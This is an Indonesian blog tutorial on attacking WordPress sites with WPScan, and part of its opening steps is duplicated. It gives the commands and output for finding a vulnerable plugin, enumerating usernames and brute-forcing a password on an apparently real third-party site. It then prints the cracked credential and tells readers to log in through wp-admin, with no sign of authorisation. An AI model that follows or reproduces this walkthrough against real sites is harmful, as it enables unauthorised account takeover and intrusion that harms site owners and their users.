Download WPScan
kata developernya,,tools ini gak support di Windows OS gan, tpi coba agan baca README nya siapa tw aja ada solusi klo di Windows
gak usah kebanyakan bacot gan.
tutor ini ane tujukan kpd Backtrackers dan Linux user
1. buka wpscan.rb (/pentest/web/wpscan )
2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y.
klo agan milih y,trus udah selesai updatenya,,biasanya muncul error kya gini pas buka wpscan.rb
kata developernya,,tools ini gak support di Windows OS gan, tpi coba agan baca README nya siapa tw aja ada solusi klo di Windows
gak usah kebanyakan bacot gan.
tutor ini ane tujukan kpd Backtrackers dan Linux user
1. buka wpscan.rb (/pentest/web/wpscan )
2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y.
klo agan milih y,trus udah selesai updatenya,,biasanya muncul error kya gini pas buka wpscan.rb
root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri>
gem install --user-install nokogiri
3. Klo udah cobe ketik ./wpscan.rb atau /wpscan.rb --help ntar munucl tuh option2nya4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln :
./wpscan.rb --url www.productbestbuy.com --enumerate p!
tinggal tunggu, ntar muncul plugin2 yg vuln [+] We found 1 plugins:
| Name: jetpack
| Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
| Directory listing enabled? Yes.
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Finished at Sun Dec 30 21:56:44 2012
tuh gan,,malah dikasih exploitnya juga5. skarang coba ane cari username nya :
./wpscan.rb --url www.productbestbuy.com --enumerate u
dan tinggal tunggu aja,,ntar keluar tuh username2 yg ada di databasenya [+] Enumerating usernames ...
We found the following 2 username/s :
admin
developer
6. skarang nyari password nya pke brute force, di tools ini kita cuma bisa pke teknik brute force untuk nyari passnya gan,,jdi inet hrus cepet dan hrus punya modal keberuntungan. dan yg pling penting harus sediain wordlist.lst bejibun gan. Wordlist ane letaknya di /root/Desktop/wordlist.lst ./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
dan hasilnya : [+] Starting the password brute forcer
Brute forcing user 'developer' with 12 passwords... 58% complete.
[SUCCESS] Username : developer Password : cisadane123456
[+] Finished at Sun Dec 30 22:38:18 2012
wkwkw,,beruntung banget ane, pass langsung tembus nemu tuh gan,,
Username : developer Password : cisadane123456[/code]
tinggal login aja gan.,site wp secara default loginnya ada di folder http://siteswp.com/wp-admin/
untuk download wordlist nya,,bisa lihat di sini gan
PIC:
penulis : RieqyNS13
wpscan developer : ethicalhacke3r
0 Komentar untuk "Enumerate/Hack wordpress site dengan wpsan.rb"